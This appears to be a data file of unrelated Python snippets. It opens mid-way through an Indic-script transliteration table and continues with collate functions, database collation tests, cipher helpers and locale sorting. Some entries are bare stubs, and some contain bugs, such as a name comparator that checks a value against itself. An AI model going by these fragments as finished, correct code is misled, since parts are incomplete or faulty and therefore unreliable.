\"visarga\"\n self.trans[u\"ં\"] = \"anusvara\"\n self.trans[u\"ଇ\"] = \"i\"\n self.trans[u\"ഓ\"] = \"oo\"\n self.trans[u\"ଗ\"] = \"ga\"\n self.trans[u\"ਝ\"] = \"jha\"\n self.trans[u\"?\"] = \"?\"\n self.trans[u\"ണ\"] = \"nna\"\n self.trans[u\"ઢ\"] = \"ddha\"\n self.trans[u\"ଧ\"] = \"dha\"\n self.trans[u\"ਭ\"] = \"bha\"\n self.trans[u\"ള\"] = \"lla\"\n self.trans[u\"લ\"] = \"la\"\n self.trans[u\"ଷ\"] = \"ssa\"\n self.trans[u\"ൃ\"] = \"r\"\n self.trans[u\"ૂ\"] = \"uu\"\n self.trans[u\"େ\"] = \"e\"\n self.trans[u\"੍\"] = \"virama\"\n self.trans[u\"ୗ\"] = \"mark\"\n self.trans[u\"ൣ\"] = \"ll\"\n self.trans[u\"ૢ\"] = \"l\"\n self.trans[u\"୧\"] = \"1\"\n self.trans[u\"੭\"] = \"7\"\n self.trans[u\"൳\"] = \"1/4\"\n self.trans[u\"୷\"] = \"sixteenths\"\n self.trans[u\"ଆ\"] = \"aa\"\n self.trans[u\"ઋ\"] = \"r\"\n self.trans[u\"ഊ\"] = \"uu\"\n self.trans[u\"ਐ\"] = \"ai\"\n self.trans[u\"ଖ\"] = \"kha\"\n self.trans[u\"છ\"] = \"cha\"\n self.trans[u\"ച\"] = \"ca\"\n self.trans[u\"ਠ\"] = \"ttha\"\n self.trans[u\"ଦ\"] = \"da\"\n self.trans[u\"ફ\"] = \"pha\"\n self.trans[u\"പ\"] = \"pa\"\n self.trans[u\"ਰ\"] = \"ra\"\n self.trans[u\"ଶ\"] = \"sha\"\n self.trans[u\"ഺ\"] = \"ttta\"\n self.trans[u\"ੀ\"] = \"ii\"\n self.trans[u\"ો\"] = \"o\"\n self.trans[u\"ൊ\"] = \"o\"\n self.trans[u\"ୖ\"] = \"mark\"\n self.trans[u\"୦\"] = \"0\"\n self.trans[u\"૫\"] = \"5\"\n self.trans[u\"൪\"] = \"4\"\n self.trans[u\"ੰ\"] = \"tippi\"\n self.trans[u\"୶\"] = \"eighth\"\n self.trans[u\"ൺ\"] = \"nn\"\n self.trans[u\"ଁ\"] = \"candrabindu\"\n self.trans[u\"അ\"] = \"a\"\n self.trans[u\"ઐ\"] = \"ai\"\n self.trans[u\"ക\"] = \"ka\"\n self.trans[u\"ਸ਼\"] = \"sha\"\n self.trans[u\"ਛ\"] = \"cha\"\n self.trans[u\"ଡ\"] = \"dda\"\n self.trans[u\"ઠ\"] = \"ttha\"\n self.trans[u\"ഥ\"] = \"tha\"\n self.trans[u\"ਫ\"] = \"pha\"\n self.trans[u\"ર\"] = \"ra\"\n self.trans[u\"വ\"] = \"va\"\n self.trans[u\"ୁ\"] = \"u\"\n self.trans[u\"ી\"] = \"ii\"\n self.trans[u\"ੋ\"] = \"oo\"\n self.trans[u\"ૐ\"] = \"om\"\n self.trans[u\"ୡ\"] = \"ll\"\n self.trans[u\"ૠ\"] = \"rr\"\n self.trans[u\"੫\"] = \"5\"\n self.trans[u\"ୱ\"] = \"wa\"\n self.trans[u\"૰\"] = \"sign\"\n self.trans[u\"൵\"] = \"quarters\"\n self.trans[u\"ਫ਼\"] = \"fa\"\n self.trans[u\"ઁ\"] = \"candrabindu\"\n self.trans[u\"ਆ\"] = \"aa\"\n self.trans[u\"ઑ\"] = \"o\"\n self.trans[u\"ଐ\"] = \"ai\"\n self.trans[u\"ഔ\"] = \"au\"\n self.trans[u\"ਖ\"] = \"kha\"\n self.trans[u\"ડ\"] = \"dda\"\n self.trans[u\"ଠ\"] = \"ttha\"\n self.trans[u\"ത\"] = \"ta\"\n self.trans[u\"ਦ\"] = \"da\"\n self.trans[u\"ର\"] = \"ra\"\n self.trans[u\"ഴ\"] = \"llla\"\n self.trans[u\"ુ\"] = \"u\"\n self.trans[u\"ୀ\"] = \"ii\"\n self.trans[u\"ൄ\"] = \"rr\"\n self.trans[u\"ૡ\"] = \"ll\"\n self.trans[u\"ୠ\"] = \"rr\"\n self.trans[u\"੦\"] = \"0\"\n self.trans[u\"૱\"] = \"sign\"\n 
self.trans[u\"୰\"] = \"isshar\"\n self.trans[u\"൴\"] = \"1/2\"\n self.trans[u\"ਁ\"] = \"bindi\"\n self.trans[u\"આ\"] = \"aa\"\n self.trans[u\"ଋ\"] = \"r\"\n self.trans[u\"ഏ\"] = \"ee\"\n self.trans[u\"ખ\"] = \"kha\"\n self.trans[u\"ଛ\"] = \"cha\"\n self.trans[u\"ട\"] = \"tta\"\n self.trans[u\"ਡ\"] = \"dda\"\n self.trans[u\"દ\"] = \"da\"\n self.trans[u\"ଫ\"] = \"pha\"\n self.trans[u\"യ\"] = \"ya\"\n self.trans[u\"શ\"] = \"sha\"\n self.trans[u\"ി\"] = \"i\"\n self.trans[u\"ੁ\"] = \"u\"\n self.trans[u\"ୋ\"] = \"o\"\n self.trans[u\"ੑ\"] = \"udaat\"\n self.trans[u\"૦\"] = \"0\"\n self.trans[u\"୫\"] = \"5\"\n self.trans[u\"൯\"] = \"9\"\n self.trans[u\"ੱ\"] = \"addak\"\n self.trans[u\"ൿ\"] = \"k\"\n self.trans[u\"ആ\"] = \"aa\"\n self.trans[u\"ଊ\"] = \"uu\"\n self.trans[u\"એ\"] = \"e\"\n self.trans[u\"ਔ\"] = \"au\"\n self.trans[u\"ഖ\"] = \"kha\"\n self.trans[u\"ଚ\"] = \"ca\"\n self.trans[u\"ટ\"] = \"tta\"\n self.trans[u\"ਤ\"] = \"ta\"\n self.trans[u\"ദ\"] = \"da\"\n self.trans[u\"ପ\"] = \"pa\"\n self.trans[u\"ય\"] = \"ya\"\n self.trans[u\"ശ\"] = \"sha\"\n self.trans[u\"િ\"] = \"i\"\n self.trans[u\"െ\"] = \"e\"\n self.trans[u\"൦\"] = \"0\"\n self.trans[u\"୪\"] = \"4\"\n self.trans[u\"૯\"] = \"9\"\n self.trans[u\"ੴ\"] = \"onkar\"\n self.trans[u\"ଅ\"] = \"a\"\n self.trans[u\"ਏ\"] = \"ee\"\n self.trans[u\"କ\"] = \"ka\"\n self.trans[u\"ઔ\"] = \"au\"\n self.trans[u\"ਟ\"] = \"tta\"\n self.trans[u\"ഡ\"] = \"dda\"\n self.trans[u\"ଥ\"] = \"tha\"\n self.trans[u\"ત\"] = \"ta\"\n self.trans[u\"ਯ\"] = \"ya\"\n self.trans[u\"റ\"] = \"rra\"\n self.trans[u\"ଵ\"] = \"va\"\n self.trans[u\"ਿ\"] = \"i\"\n self.trans[u\"ു\"] = \"u\"\n self.trans[u\"ૄ\"] = \"rr\"\n self.trans[u\"ൡ\"] = \"ll\"\n self.trans[u\"੯\"] = \"9\"\n self.trans[u\"൱\"] = \"100\"\n self.trans[u\"୵\"] = \"sixteenth\"\n self.trans[u\"અ\"] = \"a\"\n self.trans[u\"ਊ\"] = \"uu\"\n self.trans[u\"ഐ\"] = \"ai\"\n self.trans[u\"ક\"] = \"ka\"\n self.trans[u\"ଔ\"] = \"au\"\n self.trans[u\"ਚ\"] = \"ca\"\n self.trans[u\"ഠ\"] = \"ttha\"\n self.trans[u\"થ\"] = \"tha\"\n self.trans[u\"ତ\"] = \"ta\"\n self.trans[u\"ਪ\"] = \"pa\"\n self.trans[u\"ര\"] = \"ra\"\n self.trans[u\"વ\"] = \"va\"\n self.trans[u\"ീ\"] = \"ii\"\n self.trans[u\"ૅ\"] = \"e\"\n self.trans[u\"ୄ\"] = \"rr\"\n self.trans[u\"ൠ\"] = \"rr\"\n self.trans[u\"ਜ਼\"] = \"za\"\n self.trans[u\"੪\"] = \"4\"\n self.trans[u\"൰\"] = \"10\"\n self.trans[u\"୴\"] = \"quarters\"\n self.trans[u\"ਅ\"] = \"a\"\n self.trans[u\"ഋ\"] = \"r\"\n self.trans[u\"ઊ\"] = \"uu\"\n self.trans[u\"ଏ\"] = \"e\"\n self.trans[u\"ਕ\"] = \"ka\"\n self.trans[u\"ഛ\"] = \"cha\"\n self.trans[u\"ચ\"] = \"ca\"\n self.trans[u\"ଟ\"] = \"tta\"\n self.trans[u\"ਥ\"] = \"tha\"\n self.trans[u\"ഫ\"] = \"pha\"\n self.trans[u\"પ\"] = \"pa\"\n self.trans[u\"ଯ\"] = \"ya\"\n self.trans[u\"ਵ\"] = \"va\"\n self.trans[u\"ି\"] = \"i\"\n self.trans[u\"ോ\"] = \"oo\"\n self.trans[u\"ୟ\"] = \"yya\"\n self.trans[u\"൫\"] = \"5\"\n self.trans[u\"૪\"] = \"4\"\n self.trans[u\"୯\"] = \"9\"\n self.trans[u\"ੵ\"] = \"yakash\"\n self.trans[u\"ൻ\"] = \"n\"\n self.trans[u\"ઃ\"] = \"visarga\"\n self.trans[u\"ം\"] = \"anusvara\"\n self.trans[u\"ਈ\"] = \"ii\"\n self.trans[u\"ઓ\"] = \"o\"\n self.trans[u\"ഒ\"] = \"o\"\n self.trans[u\"ਘ\"] = \"gha\"\n self.trans[u\"ଞ\"] = \"nya\"\n self.trans[u\"ણ\"] = \"nna\"\n self.trans[u\"ഢ\"] = \"ddha\"\n self.trans[u\"ਲ਼\"] = \"lla\"\n self.trans[u\"ਨ\"] = \"na\"\n self.trans[u\"ମ\"] = \"ma\"\n self.trans[u\"ળ\"] = \"lla\"\n self.trans[u\"ല\"] = \"la\"\n self.trans[u\"ਸ\"] = \"sa\"\n self.trans[u\"¿\"] = \"?\"\n self.trans[u\"ା\"] = \"aa\"\n 
self.trans[u\"ૃ\"] = \"r\"\n self.trans[u\"ൂ\"] = \"uu\"\n self.trans[u\"ੈ\"] = \"ai\"\n self.trans[u\"ૣ\"] = \"ll\"\n self.trans[u\"ൢ\"] = \"l\"\n self.trans[u\"੨\"] = \"2\"\n self.trans[u\"୮\"] = \"8\"\n self.trans[u\"൲\"] = \"1000\"\n self.trans[u\"ਃ\"] = \"visarga\"\n self.trans[u\"ଉ\"] = \"u\"\n self.trans[u\"ઈ\"] = \"ii\"\n self.trans[u\"ਓ\"] = \"oo\"\n self.trans[u\"ଙ\"] = \"nga\"\n self.trans[u\"ઘ\"] = \"gha\"\n self.trans[u\"ഝ\"] = \"jha\"\n self.trans[u\"ਣ\"] = \"nna\"\n self.trans[u\"ન\"] = \"na\"\n self.trans[u\"ഭ\"] = \"bha\"\n self.trans[u\"ଜ\"] = \"ja\"\n self.trans[u\"ହ\"] = \"ha\"\n self.trans[u\"સ\"] = \"sa\"\n self.trans[u\"ഽ\"] = \"avagraha\"\n self.trans[u\"ૈ\"] = \"ai\"\n self.trans[u\"്\"] = \"virama\"\n self.trans[u\"୩\"] = \"3\"\n self.trans[u\"૨\"] = \"2\"\n self.trans[u\"൭\"] = \"7\"\n self.trans[u\"ੳ\"] = \"ura\"\n self.trans[u\"ൽ\"] = \"l\"\n self.trans[u\"ઉ\"] = \"u\"\n self.trans[u\"ଈ\"] = \"ii\"\n self.trans[u\"ഌ\"] = \"l\"\n self.trans[u\"ઙ\"] = \"nga\"\n self.trans[u\"ଘ\"] = \"gha\"\n self.trans[u\"ജ\"] = \"ja\"\n self.trans[u\"ਞ\"] = \"nya\"\n self.trans[u\"ନ\"] = \"na\"\n self.trans[u\"ബ\"] = \"ba\"\n self.trans[u\"ਮ\"] = \"ma\"\n self.trans[u\"હ\"] = \"ha\"\n self.trans[u\"ସ\"] = \"sa\"\n self.trans[u\"ਾ\"] = \"aa\"\n self.trans[u\"ૉ\"] = \"o\"\n self.trans[u\"ୈ\"] = \"ai\"\n self.trans[u\"ൌ\"] = \"au\"\n self.trans[u\"૩\"] = \"3\"\n self.trans[u\"୨\"] = \"2\"\n self.trans[u\"൬\"] = \"6\"\n self.trans[u\"੮\"] = \"8\"\n self.trans[u\"ർ\"] = \"rr\"\n self.trans[u\"ଃ\"] = \"visarga\"\n self.trans[u\"ഇ\"] = \"i\"\n self.trans[u\"ਉ\"] = \"u\"\n self.trans[u\"ଓ\"] = \"o\"\n self.trans[u\"ഗ\"] = \"ga\"\n self.trans[u\"ਙ\"] = \"nga\"\n self.trans[u\"ઞ\"] = \"nya\"\n self.trans[u\"ଣ\"] = \"nna\"\n self.trans[u\"ധ\"] = \"dha\"\n self.trans[u\"મ\"] = \"ma\"\n self.trans[u\"ଳ\"] = \"lla\"\n self.trans[u\"ഷ\"] = \"ssa\"\n self.trans[u\"ਹ\"] = \"ha\"\n self.trans[u\"ਗ਼\"] = \"ghha\"\n self.trans[u\"ા\"] = \"aa\"\n self.trans[u\"ୃ\"] = \"r\"\n self.trans[u\"േ\"] = \"ee\"\n self.trans[u\"ൗ\"] = \"mark\"\n self.trans[u\"ଢ଼\"] = \"rha\"\n self.trans[u\"ୣ\"] = \"ll\"\n self.trans[u\"൧\"] = \"1\"\n self.trans[u\"੩\"] = \"3\"\n self.trans[u\"૮\"] = \"8\"\n self.trans[u\"୳\"] = \"half\"\n for char in self.trans:\n value = self.trans[char]\n if value == \"?\":\n continue\n while value.encode(encoding, 'replace').decode(encoding) == \"?\" and value in self.trans:\n assert value != self.trans[value], \"%r == self.trans[%r]!\" % (value, value)\n value = self.trans[value]\n self.trans[char] = value", "def collate_fn(data):\n\toutput = dict()\n\n\tfor name in ['answer_ID','query_ID']:\n\t\toutput[name] = [ _[name] for _ in data]\n\n\n\tfor name in ['query_len','answer_len']:\n\t\ttemp = [ _[name] for _ in data]\t \n\t\toutput[name] = torch.stack(temp, dim=0) \n\t\n\t#deal with source and target\n\tfor name in ['answer','query']:\n\t\tlength = output['{0}_len'.format(name)]\n\t\tl = length.max().item()\n\n\t\tfor i in range(len(data)):\n\t\t\tif(l-length[i].item()>0):\n\t\t\t\tdata[i][name] = torch.cat([data[i][name],torch.zeros(l-length[i].item(),dtype=torch.long)],dim=-1)\n\n\t\ttemp = [ _[name] for _ in data]\n\t\t\n\t\toutput[name] = torch.stack(temp, dim=0).long()\n\t\t\n\n\treturn output", "def collate_fn(data):\n\n # Sort a data list by tweet length (descending order).\n # data.sort(key=lambda x: len(x[1]), reverse=True)\n texts_, targets_, relations = zip(*data)\n\n # Merge captions (from tuple of 1D tensor to 2D tensor).\n lengths = [len(text) for text in texts_]\n texts = 
torch.zeros(len(texts_), max(lengths)).long()\n for i, text in enumerate(texts_):\n end = lengths[i]\n texts[i, :end] = text[:end]\n\n lengths_targets = [len(text) for text in targets_]\n targets = torch.zeros(len(targets_), max(lengths_targets)).long()\n for i, text in enumerate(targets_):\n end = lengths_targets[i]\n targets[i, :end] = text[:end]\n return targets, lengths, texts, torch.tensor(relations).view(-1)", "def header_converter(self, s):\n\n header = clean_string(s.lower().replace(\"_\", \" \"))\n if hasattr(self, \"locale\"):\n return self.column_headers[self.locale].get(header, header)\n else:\n return header", "def test_char(self):\n\n columns = [\n (mssql.MSChar, [], {}, \"CHAR\"),\n (mssql.MSChar, [1], {}, \"CHAR(1)\"),\n (\n mssql.MSChar,\n [1],\n {\"collation\": \"Latin1_General_CI_AS\"},\n \"CHAR(1) COLLATE Latin1_General_CI_AS\",\n ),\n (mssql.MSNChar, [], {}, \"NCHAR\"),\n (mssql.MSNChar, [1], {}, \"NCHAR(1)\"),\n (\n mssql.MSNChar,\n [1],\n {\"collation\": \"Latin1_General_CI_AS\"},\n \"NCHAR(1) COLLATE Latin1_General_CI_AS\",\n ),\n (mssql.MSString, [], {}, \"VARCHAR(max)\"),\n (mssql.MSString, [1], {}, \"VARCHAR(1)\"),\n (\n mssql.MSString,\n [1],\n {\"collation\": \"Latin1_General_CI_AS\"},\n \"VARCHAR(1) COLLATE Latin1_General_CI_AS\",\n ),\n (mssql.MSNVarchar, [], {}, \"NVARCHAR(max)\"),\n (mssql.MSNVarchar, [1], {}, \"NVARCHAR(1)\"),\n (\n mssql.MSNVarchar,\n [1],\n {\"collation\": \"Latin1_General_CI_AS\"},\n \"NVARCHAR(1) COLLATE Latin1_General_CI_AS\",\n ),\n (mssql.MSText, [], {}, \"TEXT\"),\n (\n mssql.MSText,\n [],\n {\"collation\": \"Latin1_General_CI_AS\"},\n \"TEXT COLLATE Latin1_General_CI_AS\",\n ),\n (mssql.MSNText, [], {}, \"NTEXT\"),\n (\n mssql.MSNText,\n [],\n {\"collation\": \"Latin1_General_CI_AS\"},\n \"NTEXT COLLATE Latin1_General_CI_AS\",\n ),\n ]\n\n metadata = MetaData()\n table_args = [\"test_mssql_charset\", metadata]\n for index, spec in enumerate(columns):\n type_, args, kw, res = spec\n table_args.append(\n Column(\"c%s\" % index, type_(*args, **kw), nullable=None)\n )\n\n charset_table = Table(*table_args)\n dialect = mssql.dialect()\n gen = dialect.ddl_compiler(dialect, schema.CreateTable(charset_table))\n\n for col in charset_table.c:\n index = int(col.name[1:])\n testing.eq_(\n gen.get_column_specification(col),\n \"%s %s\" % (col.name, columns[index][3]),\n )\n self.assert_(repr(col))", "def nintl(self):", "def use_en(self):\n pass", "def get_default_collations(self):\n collations = self.query(sql.default_collation)\n charset_collations = {}\n for r in collations:\n charset_collations[r[\"CHARACTER_SET_NAME\"]] = r[\"COLLATION_NAME\"]\n\n # Populate utf8mb4 override\n utf8_override = self.query(\n sql.get_global_variable(\"default_collation_for_utf8mb4\")\n )\n if utf8_override and \"utf8mb4\" in charset_collations:\n charset_collations[\"utf8mb4\"] = utf8_override[0][\"Value\"]\n return charset_collations", "def load_colormaps():\n\treturn load_builtin_data('colormaps')", "def search2(ln, fn):\r\n with conn:\r\n c.execute(\"\"\"SELECT * FROM personnel WHERE first=:first COLLATE NOCASE AND last=:last COLLATE NOCASE\"\"\",\r\n {'last': ln, 'first': fn})\r\n return c.fetchall()", "def clevr_collate_fn(data):\n\tdata = sorted(data, key=lambda x: len(x[1]), reverse=True)\n\timg, q, len_q, a, f, idx = list(zip(*data))\n\tq = torch.nn.utils.rnn.pad_sequence(q, batch_first=True)\n\treturn torch.stack(img), q, list(len_q), torch.stack(a), list(f), list(idx)", "def c(k):\n if isinstance(k, str):\n return k.lower() if ord(k) % 2 == 0 else 
k.upper()\n return k", "def not_capitalized(): # noqa: D416", "def collate_fn(data):\n # sort a data list by caption length\n data.sort(key=lambda x: len(x[1]), reverse=True)\n zipped_data = list(zip(*data))\n # align_tensor = len(tokenized_caption) * len(whole_caption)\n images, captions, ids, img_ids, = zipped_data\n images = torch.stack(images, 0)\n targets = torch.zeros(len(captions), len(captions[0])).long()\n lengths = [len(cap) for cap in captions]\n for i, cap in enumerate(captions):\n end = len(cap)\n targets[i, :end] = cap[:end]\n return images, targets, lengths, ids", "def translate_leet(phrase):", "def correctWord (w):\n\n if len(re.findall(ur\"[а-я]\",w))>len(re.findall(ur\"[a-z]\",w)):\n return w.translate(eng_rusTranslateTable)\n else:\n return w.translate(rus_engTranslateTable)", "def _translate(self):\r\n\r\n for place, pseudo_binary in self.letters.items():\r\n for letter in self.alphabet:\r\n\r\n with open(os.path.join(self.training_data_folder, letter + '.json'), 'r', encoding = 'utf-8') as js:\r\n data = json.loads(js.read())\r\n\r\n if pseudo_binary in data:\r\n self.result[place] = letter\r\n break\r\n\r\n else:\r\n self.result[place] = '-'\r\n\r\n if not self.devmode:\r\n return 'Not solved'\r\n\r\n return ''.join(self.result.values())", "def applyCoder(text, coder):\n res=''\n for ch in text:\n if ch in string.ascii_lowercase:\n res = res + coder[ch]\n elif ch in string.ascii_uppercase:\n res = res + coder[ch]\n else:\n res = res + ch\n return res", "def translate(l, a, c):\n try:\n i = int(l[0])\n a.append(i)\n except ValueError:\n return False\n for j in range(97, 97 + c):\n if l[1].lower() == chr(j):\n a.append(j - 97)\n break\n elif j == (97 + c):\n return False\n try:\n i = int(l[2])\n a.append(i)\n except ValueError:\n return False\n for j in range(97, 97 + c):\n if l[3].lower() == chr(j):\n a.append(j - 97)\n break\n elif j == (97 + c):\n return False\n return True", "def ladcased(normal):\r\n\r\n ladified = ''\r\n for i, c in enumerate(normal):\r\n ladified += c.lower() if (i % 2 == 0) else c.upper()\r\n\r\n return ladified", "def map_caesar(key, plaintext):\n letters = string.ascii_lowercase\n mask = letters[key:] + letters[:key]\n transtab = str.maketrans(letters, mask)\n return plaintext.translate(transtab)", "def translateLoc(loc):\n\tif(loc[0].isalpha()):\t\n\t\treturn [int(loc[1:])-1,colDict[loc[0]],'V']\n\telse:\n\t\treturn [int(loc[:-1])-1, colDict[loc[-1]],'H']", "def translate(table, data, compress=True):\n\tout=data\n\tpoint=START_CHR\n\tfor conv in table:\n\t\tout=out.replace(*((conv, chr(point)) if compress else (chr(point), conv)))\n\t\tpoint+=1\n\treturn out", "def build_collate_fn(\n cls, args: argparse.Namespace, train: bool\n ) -> Callable[[Sequence[Dict[str, np.ndarray]]], Dict[str, torch.Tensor]]:\n raise NotImplementedError", "def mk_collation_from_prevstate(shard_chain, state, coinbase):\n # state = state or shard_chain.state\n collation = Collation(CollationHeader())\n collation.header.shard_id = shard_chain.shard_id\n collation.header.prev_state_root = state.trie.root_hash\n collation.header.coinbase = coinbase\n collation.transactions = []\n return collation", "def cz_compare(a, b):\n ma = __unicode_to_ascii(unicode(a))\n mb = __unicode_to_ascii(unicode(b))\n return cmp(ma, mb)", "def correct_col(column_name):\n corr_col_name = column_name\n # Corrected South America\n if 'Bolivia' in column_name:\n corr_col_name = 'Bolivia'\n elif 'Venezuela' in column_name:\n corr_col_name = 'Venezuela'\n # Corrected Asia\n elif 'Hong Kong' in 
column_name:\n corr_col_name = 'Hong Kong'\n elif 'Macao' in column_name:\n corr_col_name = 'Macao'\n elif 'China, mainland' in column_name:\n corr_col_name = 'China'\n elif 'Taiwan' in column_name:\n corr_col_name = 'Taiwan'\n elif 'Democratic People' in column_name:\n corr_col_name = 'North Korea'\n elif 'Republic of Korea' in column_name:\n corr_col_name = 'South Korea'\n elif 'Iran' in column_name:\n corr_col_name = 'Iran'\n elif 'Lao' in column_name:\n corr_col_name = 'Laos'\n elif 'Palestine' in column_name:\n corr_col_name = 'Occupied Palestinian Territory'\n elif 'Syrian Arab Republic' in column_name:\n corr_col_name = 'Syria'\n # Corrected Europe\n elif 'Czech' in column_name:\n corr_col_name = 'Czech Republic'\n elif 'Macedonia' in column_name:\n corr_col_name = 'Macedonia (Republic of)'\n elif 'Moldova' in column_name:\n corr_col_name = 'Moldova'\n elif 'United Kingdom' in column_name:\n corr_col_name = 'United Kingdom'\n # Corrected Africa\n elif 'Cabo Verde' in column_name:\n corr_col_name = 'Cape Verde'\n elif 'Eswatini' in column_name:\n corr_col_name = 'Swaziland'\n elif 'Saint Helena' in column_name:\n corr_col_name = 'Saint Helena'\n elif 'Tanzania' in column_name:\n corr_col_name = 'Tanzania'\n # Corrected North America\n elif 'United States of America' in column_name:\n corr_col_name = 'USA'\n elif 'Bonaire, Sint Eustatius and Saba' in column_name:\n corr_col_name = 'Bonaire, Saint Eustatius and Saba'\n \n return corr_col_name", "def _translate_string(self, data):\n data = data.encode('iso-8859-1', errors='replace')\n\n for index, char in enumerate(data):\n yield self._meta.characters - 1 - self._ct[char]", "def sortValue(self, data):\n storedText = data.get(self.name, '')\n return storedText.lower()", "def normalize_locale(loc):\n return loc.lower().replace(\"_\", \"-\")", "def collate(filename):\r\n x=open(filename,\"r\")\r\n total_words=[]\r\n for line in x:\r\n line=line.strip(\"\\n\")\r\n line=line.split(\":\")\r\n if len(total_words)<1:\r\n total_words.append(line)\r\n else:\r\n x= len(total_words)\r\n if line[0] == total_words[x-1][0]:\r\n if int(line[1]) > int(total_words[x-1][len(total_words[x-1])-1]):\r\n total_words[x-1].append(line[1])\r\n else:\r\n total_words.append(line)\r\n y = open(\"collated_ids.txt\", \"w\")\r\n # for i in range(len(total_words)):\r\n # if len(total_words[i])<3:\r\n # total_words[i]=\":\".join(total_words[i])+\"\\n\"\r\n # else:\r\n # id=\" \".join(total_words[i][1:])\r\n # total_words[i]=total_words[i][0]+\":\"+id+\"\\n\"\r\n # y.writelines(total_words)\r\n for i in range(len(total_words)):\r\n id=\"\"\r\n for j in range(1,len(total_words[i])):\r\n id=id +total_words[i][j] +\" \"\r\n y.write(str(total_words[i][0]) + \":\" +str(id) + \"\\n\")", "def remaining_en():\n return([letter for letter in alphabet if decoded_dict[letter].upper() == letter])", "def update_collation_env_variables(state, collation):\n state.block_coinbase = collation.header.coinbase", "def __get_utl_charset(self, url_content):\n pass", "def _custom_sorter(self, key1, key2):\n\n col = self._col\n ascending = self._colSortFlag[col]\n real = self.get_real_col(col)\n item1 = self.itemDataMap[key1][real]\n item2 = self.itemDataMap[key2][real]\n\n # Internationalization of string sorting with locale module\n if isinstance(item1, str) and isinstance(item2, str):\n cmpVal = locale.strcoll(item1, item2)\n elif isinstance(item1, bytes) or isinstance(item2, bytes):\n cmpVal = locale.strcoll(str(item1), str(item2))\n else:\n cmpVal = cmp(item1, item2)\n\n # If the items are 
equal, then pick something else to make the sort value unique\n if cmpVal == 0:\n cmpVal = cmp(*self.GetSecondarySortValues(col, key1, key2))\n\n if ascending:\n return cmpVal\n else:\n return -cmpVal", "def sortKey(self, p_str): # real signature unknown; restored from __doc__\n return QCollatorSortKey", "def _algo_to_xfrm(self, x):\n return {\n \"aes-ctr\": \"rfc3686(ctr(aes))\",\n \"AES-GCM\": \"rfc4106(gcm(aes))\",\n \"hmac-md5\": \"hmac(md5)\",\n \"hmac-sha256\": \"hmac(sha256)\",\n \"null\": \"ecb(cipher_null)\",\n \"null-auth\": \"digest_null\"\n }[x]", "def normalize(text):\n return text.lower().translate(TRANSLATION_TABLE)", "def lower(self) -> str:", "def test_multicolumn_factorize_columns():\n df = pd.DataFrame(\n {\n \"a\": [\"hello\", \"hello\", \"sup\"],\n \"b\": [1, 2, 3],\n \"c\": [\"aloha\", \"nihao\", \"nihao\"],\n }\n ).factorize_columns(column_names=[\"a\", \"c\"])\n assert \"a_enc\" in df.columns\n assert \"c_enc\" in df.columns", "def build_messy_lookup(source,dest,ref_col):\n la = QuickGrid().open(source)\n od = QuickGrid().open(join(\"source_files\",\"local_authority_data_names.csv\"))\n\n lookup = QuickGrid()\n lookup.header = [\"la name\",ref_col]\n\n possible = [\"official-name\",\"alt-name-1\",\"alt-name-2\",\"alt-name-3\"]\n possible = [p for p in possible if p in la.header]\n for r in la:\n for p in possible:\n if r[p]:\n lookup.add([r[p],r[ref_col]])\n \n current_names = [x[0] for x in lookup]\n\n for r in od:\n if r[\"name\"] not in current_names:\n code = r[\"local-authority\"].split(\":\")[1]\n lookup.add([r[\"name\"],code])\n \n lookup.save(dest,force_unicode=True)", "def sort_nicely(col):\n convert = lambda text: int(text) if text.isdigit() else text\n alphanum_key = lambda key: [convert(c) for c in re.split('([0-9]+)', key[col])]\n return alphanum_key", "def question_new_translate():", "def test_get_supported_locales_for_voice_datasets(self):\n pass", "def build_messy_lookup_lad(source,dest):\n la = QuickGrid().open(source)\n\n lookup = QuickGrid()\n lookup.header = [\"gss-code\",\"local-authority-code\"]\n\n possible = [\"gss-code\",\"archaic-gss-code\"]\n possible = [p for p in possible if p in la.header]\n for r in la:\n for p in possible:\n if r[p]:\n values = r[p].split(\",\")\n for v in values:\n lookup.add([v,r[\"local-authority-code\"]])\n \n lookup.save(dest,force_unicode=True)", "def test_multicolumn_factorize_columns_suffix_change():\n df = pd.DataFrame(\n {\n \"a\": [\"hello\", \"hello\", \"sup\"],\n \"b\": [1, 2, 3],\n \"c\": [\"aloha\", \"nihao\", \"nihao\"],\n }\n ).factorize_columns(column_names=[\"a\", \"c\"], suffix=\"_col\")\n assert \"a_col\" in df.columns\n assert \"c_col\" in df.columns\n assert \"a_enc\" not in df.columns\n assert \"c_enc\" not in df.columns", "def _load_transliterated_regional(self):\n# global approved, conflicts, suggestions, unknown, cldr, current\n start = self.lblFallback['text'].find('=>') + 2\n if self.lblFallback['text'][start:]:\n self.preferred.set(\\\n self._transliterate_text(self.lblFallback['text'][start:]))\n pass", "def name_comparator(last_name):\n score = 0\n\n # check if first n letters of first and last name matches\n for i in range(1, 4):\n if len(first_name) >= i and len(last_name) >= 2:\n # if previous letter does not match, don't continue\n if i > 1 and score > (i - 1) * -1:\n break\n\n # lower score by one per each matching letter\n if first_name[i - 1: i] == last_name[i - 1: i]:\n score -= 1\n\n \"\"\"detect names with umlauts and give them higher score if both have\n them, lower score if 
only one has them.\"\"\"\n regex = compile(r'[äöå]')\n if score == 0:\n if regex.search(first_name) and regex.search(last_name):\n score -= 1\n else:\n if bool(regex.search(last_name)) != bool(regex.search(last_name)):\n score += 1\n\n return score", "def _on_loadPrefChar(self, dummy, _prefchar=None, _lst='', _filein=''):\n\n lst = _lst if len(_lst) > 0 else self.ddnPrefChar.get()\n prefchar = _prefchar if _prefchar is not None else self.txtPrefChar\n# if lst == 'Latin1':\n## if len(self.txtPrefChar.get(0.0, 9999.9999).rstrip()) > 0:\n# if prefchar.get(0.0, 9999.9999).rstrip():\n# prefchar.insert(9999.9999, ', ' + LATIN1)\n# else:\n# prefchar.insert(9999.9999, LATIN1)\n if lst == '': #del\n prefchar.delete(0.0, 9999.9999)\n else: #load txt file\n if len(_filein) == 0:\n filein = os.path.normpath(self.BibTerm + '/'+ lst + '.csv')\n else:\n filein = _filein\n fin = codecs.open(filein, mode='r', encoding='utf-8')\n text = fin.read()\n# if len(self.txtPrefChar.get(0.0, 9999.9999).strip()) > 0:\n if prefchar.get(0.0, 9999.9999).strip():\n text = ', ' + text\n prefchar.insert(9999.9999, text)\n fin.close()", "def test_unicode_chars_in_course_name_import(self):\r\n module_store = modulestore('direct')\r\n course_id = SlashSeparatedCourseKey(u'Юникода', u'unicode_course', u'échantillon')\r\n import_from_xml(\r\n module_store,\r\n 'common/test/data/',\r\n ['2014_Uni'],\r\n target_course_id=course_id\r\n )\r\n\r\n course = module_store.get_course(course_id)\r\n 